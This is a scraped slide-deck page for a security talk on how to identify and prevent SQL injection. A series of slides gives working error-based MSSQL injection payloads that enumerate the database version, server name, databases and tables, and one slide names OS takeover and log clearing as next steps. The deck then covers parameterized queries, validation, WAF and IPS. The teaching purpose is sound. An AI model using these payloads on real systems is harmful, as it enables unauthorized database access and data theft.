Eguardian Global Services, profile picture
Uploaded byEguardian Global Services
632 views

How to identify and prevent SQL injection

The document discusses SQL injection (SQLi) as a major web application vulnerability that can compromise sensitive data and lead to unauthorized access. It outlines notable SQLi incidents and explains how attackers manipulate SQL queries to extract, modify, or delete data. Prevention strategies include using parameterized queries, validating user input, and employing web application firewalls and intrusion prevention systems.

How to Identify and Prevent SQL Injection
#Whoami Janith Malinga Security Consultant @egscyber Web Pentester for 4 years Enthusiastic traveler Community teacher over for 6 years Twitter : @janithSmalinga linkedIn : https://www.linkedin.com/in/malingajanith/ Github : https://github.com/janithmalinga Phone : 0769803462
Why web applications need security • Behind most applications lies sensitive data • Easy to access • Anybody can access from anywhere • Hard to trace back • Lot of tools available to hack a web site (sql map, BEEF)
Web Application Vulnerabilities OWASP Top 10 Application Security Risks 1. Injection 2. Broken Authentication 3. Sensitive Data Exposure 4. XML External Entities (XXE) 5. Broken Access Control 6. Security Misconfiguration 7. Cross-Site Scripting (XSS) 8. Insecure Deserialization 9. Using Components with Known Vulnerabilities 10. Insufficient Logging & Monitoring
SQL Injection (SQLi)
What is SQLi SQLi is a vulnerability that results in letting an attacker influence SQL queries that an application passes to the backend of a database
Well known SQLi Attacks • Lenovo (2019) 1+ million users compromised • Texas.gov and Florida.gov (2018) state databases of contractors and employees leaked. • Shamshabad engineering college incident (2018) Students hack the system and changed their results • Mossack Fonseca (Panama Papers) (2016) The famous panama paper incident by wikileaks.
Well known SQLi Attacks SQLi Malwares • Asprox • Lizamoon
Understand how web applications work Client Computer Application Server Database Server
Understand how web applications work Client Computer Application Server Database Server Request /home.php Response /home.php
Understand how web applications work Student search ID: Search https://www.abcd.com/student
Understand how web applications work Student search 123ID: Search https://www.abcd.com/student?id=123
Understand how web applications work Student search 123ID: Search https://www.abcd.com/student ID 123 Name Bob Age 18 Class Maths
Understand how web applications work Client Computer Application Server Database Server Request /student.php?id=123 Response /student.php id=123&name=Bob&a ge=18&class=Maths What’s happening under the hood??? Select * from students where id=123 123 Bob 18 Maths
Understanding SQLi Recall: what is SQLi? SQLi is a vulnerability that results when you gives an attacker the ability to influence the SQL queries that an application passes to a backend database.
Understanding SQLi Now let’s manipulate the input so that the database will be confused ☺
Understand how web applications work Student search ‘ID: Search https://www.abcd.com/student?id=‘ The user input is only ‘ character
Understand how web applications work Client Computer Application Server Database Server Request /student.php?id=‘ Response /student.php Error: What the heck are you searching??? What’s happening under the hood??? Select * from students where id=‘ Error: What the heck are you searching???
Understand how web applications work Student search ‘ID: Search https://www.abcd.com/student?id=‘ Error: What the heck are you searching???
MySQL error
MSSQL error
Understanding SQLi DEMO
What SQLi can do • Extract data • Add or modify data • Perform DOS attack • Bypass authentication • Executing remote commands
Sample SQL Injection Attack
Web login form First we sent the input ‘ character Member login Username: Password: Login
Output – page is vulnerable to sql injection
Payload: a’ and 1=0/@@version;-- Find database version
Payload: a' and 1=0/(select @@servername);-- Find server name
Payload: a' and 1=0/(select db_name());-- Find database name
Payload: a' and 1=0/(select top 1 name from master..sysdatabases);-- Find all databases
Payload: a' and 1=0/(select top 1 name from master..sysdatabases where name not in (select top 1 name from master..sysdatabases));-- Find all databases
Payload: a' and 1=0/(select top 1 name from master..sysdatabases where name not in (select top 2 name from master..sysdatabases));-- Find all databases
Payload: a' and 1=0/(select top 1 name from sysobjects where xtype = 'U' and name NOT IN (select top 1 name from sysobjects where xtype = 'U'));-- Find tables
Payload: a' and 1=0/(select top 1 name from sysobjects where xtype = 'U' and name NOT IN (select top 2 name from sysobjects where xtype = 'U'));-- Find tables
Payload: a' and 1=0/(select top 1 name from sysobjects where xtype = 'U' and name NOT IN (select top 3 name from sysobjects where xtype = 'U'));-- Find tables
Next steps • Getting all the data • Manipulating the data • Finally exploit the OS and gain access to the server and clear the logs. ☺ ☺ ☺
How to Prevent SQL Injection
Prevent SQL Injection 1. Code level prevention 2. Platform level prevention
Prevent SQL Injection Code level prevention - Use parameterized queries Bad practice username = request(“username”) password = request(“password”) sql = “SELECT * FROM users WHERE username=‘ ” + username + “ ’ AND password=‘ “ + password + “ ‘ “; result = Db.Execute(sql) If(result){/*Login success*/}
Prevent SQL Injection Good practice : Use parameterized queries username = request(“username”) password = request(“password”) string sql = “SELECT * FROM users WHERE username=? AND password=?”; preparedstatement cmd = con.preparedstatement(sql); cmd.setstring(1, username); cmd.setstring(2, password); result = cmd.executeQuery(); If(result){/*Login success*/}
Prevent SQL Injection Code level prevention - Validating input • Whitelisting • Blacklisting Data type, data size, data range, content
Prevent SQL Injection Code level prevention - Encoding output Encoding to the database sql = sql.replace(“’”, “’’”);
Prevent SQL Injection Platform level prevention - Web application firewall (WAF)
Prevent SQL Injection Platform level prevention - IPS
Prevent SQL Injection Platform level prevention – Log collection and Monitoring
Q&A !!!
How to identify and prevent SQL injection

More Related Content

PPT
A Brief Introduction in SQL Injection
bySina Manavi
 
PPTX
SQL Injections - A Powerpoint Presentation
byRapid Purple
 
PPTX
Sql injection
byZidh
 
PPTX
SQL Injections (Part 1)
byn|u - The Open Security Community
 
PDF
Sql Injection - Vulnerability and Security
bySandip Chaudhari
 
PPT
Sql injection
byNikunj Dhameliya
 
PPTX
Sql injections - with example
byPrateek Chauhan
 
PPTX
Ppt on sql injection
byashish20012
 
A Brief Introduction in SQL Injection
bySina Manavi
 
SQL Injections - A Powerpoint Presentation
byRapid Purple
 
Sql injection
byZidh
 
SQL Injections (Part 1)
byn|u - The Open Security Community
 
Sql Injection - Vulnerability and Security
bySandip Chaudhari
 
Sql injection
byNikunj Dhameliya
 
Sql injections - with example
byPrateek Chauhan
 
Ppt on sql injection
byashish20012
 

What's hot

PPTX
Command injection
bypenetration Tester
 
PPT
Intro to Web Application Security
byRob Ragan
 
PPTX
Os Command Injection Attack
byRaghav Bisht
 
PDF
What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybers...
byEdureka!
 
PPTX
Sql injection
byNuruzzaman Milon
 
PDF
Secure coding presentation Oct 3 2020
byMoataz Kamel
 
PPTX
How to Test for The OWASP Top Ten
bySecurity Innovation
 
PPTX
Web application attacks
byhruth
 
PPTX
Sql Injection
bypenetration Tester
 
PPTX
SQL injection
byRaj Parmar
 
PPTX
Security testing fundamentals
byCygnet Infotech
 
PPTX
Sql injection
bySasha-Leigh Garret
 
PDF
Secure Coding principles by example: Build Security In from the start - Carlo...
byCodemotion
 
PPTX
SQL INJECTION
byMentorcs
 
PPT
Introduction To OWASP
byMarco Morana
 
PPTX
Unrestricted file upload CWE-434 - Adam Nurudini (ISACA)
byAdam Nurudini
 
PPTX
OWASP TOP 10 VULNERABILITIS
byNull Bhubaneswar
 
PDF
OWASP Top 10 Web Application Vulnerabilities
bySoftware Guru
 
PPTX
Owasp top 10 vulnerabilities
byOWASP Delhi
 
PPTX
OWASP Top 10 2021 What's New
byMichael Furman
 
Command injection
bypenetration Tester
 
Intro to Web Application Security
byRob Ragan
 
Os Command Injection Attack
byRaghav Bisht
 
What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybers...
byEdureka!
 
Sql injection
byNuruzzaman Milon
 
Secure coding presentation Oct 3 2020
byMoataz Kamel
 
How to Test for The OWASP Top Ten
bySecurity Innovation
 
Web application attacks
byhruth
 
Sql Injection
bypenetration Tester
 
SQL injection
byRaj Parmar
 
Security testing fundamentals
byCygnet Infotech
 
Sql injection
bySasha-Leigh Garret
 
Secure Coding principles by example: Build Security In from the start - Carlo...
byCodemotion
 
SQL INJECTION
byMentorcs
 
Introduction To OWASP
byMarco Morana
 
Unrestricted file upload CWE-434 - Adam Nurudini (ISACA)
byAdam Nurudini
 
OWASP TOP 10 VULNERABILITIS
byNull Bhubaneswar
 
OWASP Top 10 Web Application Vulnerabilities
bySoftware Guru
 
Owasp top 10 vulnerabilities
byOWASP Delhi
 
OWASP Top 10 2021 What's New
byMichael Furman
 

Similar to How to identify and prevent SQL injection

PPTX
SQLi for Security Champions
byPetraVukmirovic
 
PPTX
Sql injection
byMehul Boghra
 
PPTX
Understanding and preventing sql injection attacks
byKevin Kline
 
PDF
Ijcatr04041018
byEditor IJCATR
 
PPT
D:\Technical\Ppt\Sql Injection
byavishkarm
 
PPSX
Web application security
bywww.netgains.org
 
PPTX
SQL Injections - 2016 - Huntington Beach
byJeff Prom
 
PDF
Protect Your Database_ SQL Injection Attack Prevention.pdf
bySachin FromDev
 
PPTX
SQL Injection Introduction and Prevention
byMohammed Fazuluddin
 
PDF
Chapter 14 sql injection
bynewbie2019
 
PDF
Sql injection
byGauthamMK
 
PPTX
Sql injection
bySuraj Tiwari
 
PPTX
SQL Injection: Unraveling the Threats
byInsecureLab
 
PPTX
Sql injection
byUzair ul Haq Khan
 
PPT
Sql injection
byNitish Kumar
 
PPTX
Sql Injection
byAju Thomas
 
PPTX
cgbhjjjjjjjnmmmkmmmmmmkkkkkkTutorial5.pptx
byprasadGade6
 
PDF
Sql injection
bySafwan Hashmi
 
PPTX
SQL INJECTION
byAnoop T
 
PDF
Sql injection bypassing hand book blackrose
byNoaman Aziz
 
SQLi for Security Champions
byPetraVukmirovic
 
Sql injection
byMehul Boghra
 
Understanding and preventing sql injection attacks
byKevin Kline
 
Ijcatr04041018
byEditor IJCATR
 
D:\Technical\Ppt\Sql Injection
byavishkarm
 
Web application security
bywww.netgains.org
 
SQL Injections - 2016 - Huntington Beach
byJeff Prom
 
Protect Your Database_ SQL Injection Attack Prevention.pdf
bySachin FromDev
 
SQL Injection Introduction and Prevention
byMohammed Fazuluddin
 
Chapter 14 sql injection
bynewbie2019
 
Sql injection
byGauthamMK
 
Sql injection
bySuraj Tiwari
 
SQL Injection: Unraveling the Threats
byInsecureLab
 
Sql injection
byUzair ul Haq Khan
 
Sql injection
byNitish Kumar
 
Sql Injection
byAju Thomas
 
cgbhjjjjjjjnmmmkmmmmmmkkkkkkTutorial5.pptx
byprasadGade6
 
Sql injection
bySafwan Hashmi
 
SQL INJECTION
byAnoop T
 
Sql injection bypassing hand book blackrose
byNoaman Aziz
 

Recently uploaded

PPTX
UiPath Automation Suite_Community Session_3/3
bysuhanisingh58689
 
PPTX
Integration Everywhere - Supercharge Your AI Agents with Custom Connectors.pptx
byEric Shupps
 
PDF
FME Realize in the Real World - The Power of Spatial Computing in Action
bySafe Software
 
PDF
Top 11 Sites to Buy Verified GitHub Accounts in 2025
byBuy GitHub Accounts Looking for a verified GitHub account?
 
PPTX
Softaken SQLite DB Converter for Seamless SQLite Database file Conversion on ...
byDemetrio Parrilla
 
DOCX
Formula 2 - APIC HBEL general calculation.docx
byMarkus Janssen
 
PDF
Fighting CVEs in Embedded Linux with the Yocto Project and OTA Updates
byLeon Anavi
 
PDF
ODSC West 2025 OpenMetadata Workshop.pdf
byOpenMetadata
 
PDF
Build Agentic AI Applications with Oracle AI Database Private Agent Factory -...
bySandesh Rao
 
PDF
Staying Ahead of the Curve - Roaming Just Got Easier
bypanagenda
 
PDF
AI64 - Mapping the Next Generation of Enterprise Software | Redpoint Ventures
byRazin Mustafiz
 
PDF
Dev Dives: Unlocking Enterprise Data with UiPath Data Fabric
byUiPathCommunity
 
PDF
Linux Day Prato 2025: NixOS spiegato ammiocuggino - NixOS for Human Beings
byPeter Bittner
 
PDF
Embedding sustainability: Tips for ebook and print production - Tech Forum 2025
byBookNet Canada
 
PDF
Session 8 Specialized AI Associate Series: Fundamentals of Model Training
byDianaGray10
 
DOCX
Formula 1 - APIC general MACO calculation.docx
byMarkus Janssen
 
PDF
Performance.sync(): 7 Levels of a Web Performance Journey
bySergeyChernyshev
 
PDF
Ready, set, go: Pre-fall sales trends and data-driven insights - Tech Forum 2025
byBookNet Canada
 
PDF
Transcript: Embedding sustainability: Tips for ebook and print production - T...
byBookNet Canada
 
PPTX
Unitree H2 Humanoid Robot: Redefining Robotics with Advanced Dexterity and In...
byDronevex
 
UiPath Automation Suite_Community Session_3/3
bysuhanisingh58689
 
Integration Everywhere - Supercharge Your AI Agents with Custom Connectors.pptx
byEric Shupps
 
FME Realize in the Real World - The Power of Spatial Computing in Action
bySafe Software
 
Top 11 Sites to Buy Verified GitHub Accounts in 2025
byBuy GitHub Accounts Looking for a verified GitHub account?
 
Softaken SQLite DB Converter for Seamless SQLite Database file Conversion on ...
byDemetrio Parrilla
 
Formula 2 - APIC HBEL general calculation.docx
byMarkus Janssen
 
Fighting CVEs in Embedded Linux with the Yocto Project and OTA Updates
byLeon Anavi
 
ODSC West 2025 OpenMetadata Workshop.pdf
byOpenMetadata
 
Build Agentic AI Applications with Oracle AI Database Private Agent Factory -...
bySandesh Rao
 
Staying Ahead of the Curve - Roaming Just Got Easier
bypanagenda
 
AI64 - Mapping the Next Generation of Enterprise Software | Redpoint Ventures
byRazin Mustafiz
 
Dev Dives: Unlocking Enterprise Data with UiPath Data Fabric
byUiPathCommunity
 
Linux Day Prato 2025: NixOS spiegato ammiocuggino - NixOS for Human Beings
byPeter Bittner
 
Embedding sustainability: Tips for ebook and print production - Tech Forum 2025
byBookNet Canada
 
Session 8 Specialized AI Associate Series: Fundamentals of Model Training
byDianaGray10
 
Formula 1 - APIC general MACO calculation.docx
byMarkus Janssen
 
Performance.sync(): 7 Levels of a Web Performance Journey
bySergeyChernyshev
 
Ready, set, go: Pre-fall sales trends and data-driven insights - Tech Forum 2025
byBookNet Canada
 
Transcript: Embedding sustainability: Tips for ebook and print production - T...
byBookNet Canada
 
Unitree H2 Humanoid Robot: Redefining Robotics with Advanced Dexterity and In...
byDronevex
 
In this document
Powered by AI

Introduction to the need for identifying and preventing SQL Injection vulnerabilities.

Janith Malinga, Security Consultant with 4 years of pentesting experience and involved in community teaching.

Sensitive data is behind most applications; easily accessible and hard to trace; numerous hacking tools available.

Overview of OWASP Top 10 risks including Injection and Broken Authentication.

Introduction and explanation of SQL Injection (SQLi) vulnerability that allows attackers to manipulate SQL queries.

Famous attacks due to SQLi, e.g., Lenovo, Texas.gov, and malware types associated with SQLi.

Basic understanding of web application operations, showing client-server interactions and data fetching process with examples.

Further explanation of SQL Injection, including how it manipulates user inputs to confuse databases.

Illustration of MySQL and MSSQL error messages that indicate SQL Injection attempts.

Live demonstration of SQL Injection techniques and their implications.

Potential damage caused by SQLi, such as data extraction, manipulation, DOS attacks, and bypassing security.

Series of SQL Injection payload samples illustrating various techniques to extract database information.

Introduction to preventive measures against SQL Injection.

Two main categories of SQL Injection prevention: Code level and Platform level.

Best coding practices to prevent SQLi including parameterized queries, input validation, and output encoding.

Mitigation measures at the platform level such as Web Application Firewall, Intrusion Prevention Systems, and Monitoring.

Open floor for questions to clarify SQL Injection concepts and prevention strategies.

How to identify and prevent SQL injection

  • 1.
    How to Identifyand Prevent SQL Injection
  • 2.
    #Whoami Janith Malinga Security Consultant@egscyber Web Pentester for 4 years Enthusiastic traveler Community teacher over for 6 years Twitter : @janithSmalinga linkedIn : https://www.linkedin.com/in/malingajanith/ Github : https://github.com/janithmalinga Phone : 0769803462
  • 3.
    Why web applicationsneed security • Behind most applications lies sensitive data • Easy to access • Anybody can access from anywhere • Hard to trace back • Lot of tools available to hack a web site (sql map, BEEF)
  • 4.
    Web Application Vulnerabilities OWASPTop 10 Application Security Risks 1. Injection 2. Broken Authentication 3. Sensitive Data Exposure 4. XML External Entities (XXE) 5. Broken Access Control 6. Security Misconfiguration 7. Cross-Site Scripting (XSS) 8. Insecure Deserialization 9. Using Components with Known Vulnerabilities 10. Insufficient Logging & Monitoring
  • 5.
  • 6.
    What is SQLi SQLiis a vulnerability that results in letting an attacker influence SQL queries that an application passes to the backend of a database
  • 7.
    Well known SQLiAttacks • Lenovo (2019) 1+ million users compromised • Texas.gov and Florida.gov (2018) state databases of contractors and employees leaked. • Shamshabad engineering college incident (2018) Students hack the system and changed their results • Mossack Fonseca (Panama Papers) (2016) The famous panama paper incident by wikileaks.
  • 8.
    Well known SQLiAttacks SQLi Malwares • Asprox • Lizamoon
  • 9.
    Understand how webapplications work Client Computer Application Server Database Server
  • 10.
    Understand how webapplications work Client Computer Application Server Database Server Request /home.php Response /home.php
  • 11.
    Understand how webapplications work Student search ID: Search https://www.abcd.com/student
  • 12.
    Understand how webapplications work Student search 123ID: Search https://www.abcd.com/student?id=123
  • 13.
    Understand how webapplications work Student search 123ID: Search https://www.abcd.com/student ID 123 Name Bob Age 18 Class Maths
  • 14.
    Understand how webapplications work Client Computer Application Server Database Server Request /student.php?id=123 Response /student.php id=123&name=Bob&a ge=18&class=Maths What’s happening under the hood??? Select * from students where id=123 123 Bob 18 Maths
  • 15.
    Understanding SQLi Recall: whatis SQLi? SQLi is a vulnerability that results when you gives an attacker the ability to influence the SQL queries that an application passes to a backend database.
  • 16.
    Understanding SQLi Now let’smanipulate the input so that the database will be confused ☺
  • 17.
    Understand how webapplications work Student search ‘ID: Search https://www.abcd.com/student?id=‘ The user input is only ‘ character
  • 18.
    Understand how webapplications work Client Computer Application Server Database Server Request /student.php?id=‘ Response /student.php Error: What the heck are you searching??? What’s happening under the hood??? Select * from students where id=‘ Error: What the heck are you searching???
  • 19.
    Understand how webapplications work Student search ‘ID: Search https://www.abcd.com/student?id=‘ Error: What the heck are you searching???
  • 20.
  • 21.
  • 22.
  • 23.
    What SQLi cando • Extract data • Add or modify data • Perform DOS attack • Bypass authentication • Executing remote commands
  • 24.
  • 25.
    Web login form Firstwe sent the input ‘ character Member login Username: Password: Login
  • 26.
    Output – pageis vulnerable to sql injection
  • 27.
    Payload: a’ and1=0/@@version;-- Find database version
  • 28.
    Payload: a' and1=0/(select @@servername);-- Find server name
  • 29.
    Payload: a' and1=0/(select db_name());-- Find database name
  • 30.
    Payload: a' and1=0/(select top 1 name from master..sysdatabases);-- Find all databases
  • 31.
    Payload: a' and1=0/(select top 1 name from master..sysdatabases where name not in (select top 1 name from master..sysdatabases));-- Find all databases
  • 32.
    Payload: a' and1=0/(select top 1 name from master..sysdatabases where name not in (select top 2 name from master..sysdatabases));-- Find all databases
  • 33.
    Payload: a' and1=0/(select top 1 name from sysobjects where xtype = 'U' and name NOT IN (select top 1 name from sysobjects where xtype = 'U'));-- Find tables
  • 34.
    Payload: a' and1=0/(select top 1 name from sysobjects where xtype = 'U' and name NOT IN (select top 2 name from sysobjects where xtype = 'U'));-- Find tables
  • 35.
    Payload: a' and1=0/(select top 1 name from sysobjects where xtype = 'U' and name NOT IN (select top 3 name from sysobjects where xtype = 'U'));-- Find tables
  • 36.
    Next steps • Gettingall the data • Manipulating the data • Finally exploit the OS and gain access to the server and clear the logs. ☺ ☺ ☺
  • 37.
    How to PreventSQL Injection
  • 38.
    Prevent SQL Injection 1.Code level prevention 2. Platform level prevention
  • 39.
    Prevent SQL Injection Codelevel prevention - Use parameterized queries Bad practice username = request(“username”) password = request(“password”) sql = “SELECT * FROM users WHERE username=‘ ” + username + “ ’ AND password=‘ “ + password + “ ‘ “; result = Db.Execute(sql) If(result){/*Login success*/}
  • 40.
    Prevent SQL Injection Goodpractice : Use parameterized queries username = request(“username”) password = request(“password”) string sql = “SELECT * FROM users WHERE username=? AND password=?”; preparedstatement cmd = con.preparedstatement(sql); cmd.setstring(1, username); cmd.setstring(2, password); result = cmd.executeQuery(); If(result){/*Login success*/}
  • 41.
    Prevent SQL Injection Codelevel prevention - Validating input • Whitelisting • Blacklisting Data type, data size, data range, content
  • 42.
    Prevent SQL Injection Codelevel prevention - Encoding output Encoding to the database sql = sql.replace(“’”, “’’”);
  • 43.
    Prevent SQL Injection Platformlevel prevention - Web application firewall (WAF)
  • 44.
    Prevent SQL Injection Platformlevel prevention - IPS
  • 45.
    Prevent SQL Injection Platformlevel prevention – Log collection and Monitoring
  • 46.